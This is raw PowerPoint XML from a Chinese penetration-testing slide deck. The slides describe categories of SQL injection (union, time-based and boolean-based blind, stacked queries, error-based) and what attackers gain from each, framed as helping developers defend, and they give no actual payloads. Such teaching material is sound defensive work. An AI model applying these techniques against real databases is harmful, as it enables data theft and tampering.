              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询中添加联合查询操作，将攻击者自定义的查询结果合并到原始查询结果中。攻击者可以利用这种方式获取额外的数据或绕过访问控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于时间的盲注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Time-based Blind Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于时间的盲注入是利用延时函数或条件语句的执行时间来判断注入是否成功的一种注入技术。攻击者通过在注入点使用时间延迟来判断是否存在漏洞，并逐步获取敏感信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于布尔盲注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Boolean-based Blind Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于布尔盲注入是一种在注入点上利用布尔条件判断来获取数据的注入技术。攻击者通过构造布尔条件语句，根据应用程序的响应结果判断注入点是否成功，并逐步推断和获取敏感信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于堆叠查询的注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Stacked Queries Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于堆叠查询的注入是通过在注入点中插入多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句，使得应用程序在执行原始查询之外还执行了攻击者定义的其他查询语句。攻击者可以利用这种方式执行恶意操作或获取额外的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基于报错盲注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Error-based Blind Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   基于报错盲注入是一种在注入点上利用错误信息来判断是否存在注入漏洞的技术。攻击者通过构造恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码，触发数据库错误信息，从而判断注入点是否存在漏洞，并获取相关信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这些仅是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的一些常见分类，攻击者可以根据具体的应用程序和数据库来使用不同的注入技术。了解这些分类可以帮助开发人员更好地了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的工作原理，并采取相应的防御措施。</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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的重要性体现在以下几个方面：</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据篡改：攻击者可以修改或删除数据库中的数据，导致数据不一致、损坏或破坏业务完整性。</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发过程中的注意事项：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的重要性体现在以下几个方面：</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据篡改：攻击者可以修改或删除数据库中的数据，导致数据不一致、损坏或破坏业务完整性。</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发过程中的注意事项：</a:t>
            </a:r>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515" y="3419475"/>
            <a:ext cx="8020050" cy="93423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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的重要性体现在以下几个方面：</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据篡改：攻击者可以修改或删除数据库中的数据，导致数据不一致、损坏或破坏业务完整性。</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发过程中的注意事项：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的重要性体现在以下几个方面：</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据篡改：攻击者可以修改或删除数据库中的数据，导致数据不一致、损坏或破坏业务完整性。</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发过程中的注意事项：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重要性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的重要性体现在以下几个方面：</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据篡改：攻击者可以修改或删除数据库中的数据，导致数据不一致、损坏或破坏业务完整性。</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开发过程中的注意事项：</a:t>
            </a:r>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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785994" y="4572627"/>
            <a:ext cx="14812010" cy="2397125"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10892626" y="7467165"/>
            <a:ext cx="2598747"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2022.12</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0"/>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377535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渗透测技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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1905000"/>
            <a:ext cx="6858000" cy="11677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6c8ba65-d2d4-45ae-8807-383edd5b404f"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMzVhMzJkZWI4OThhNjhlZDFhNTAzZGY0YWE3YjhmMj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4.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981</TotalTime>
  <Words>13562</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>1026</Paragraphs>
  <Slides>83</Slides>
  <Notes>38</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83</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98" baseType="lpstr">
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>SentyWen</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Nunito Sans</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>自定义设计</vt:lpstr>
      <vt:lpstr>1_自定义设计</vt:lpstr>
      <vt:lpstr>2_自定义设计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YangMengYu</dc:creator>
  <cp:lastModifiedBy>xu loong</cp:lastModifiedBy>
  <cp:revision>249</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-28T07:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T10:10:36Z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0x010100B1227BC1501576409166E8FD4661461A</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14309</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>6DC071D8FA6045768C23E3142BF16B38_12</vt:lpwstr>
  </property>
</Properties>
</file>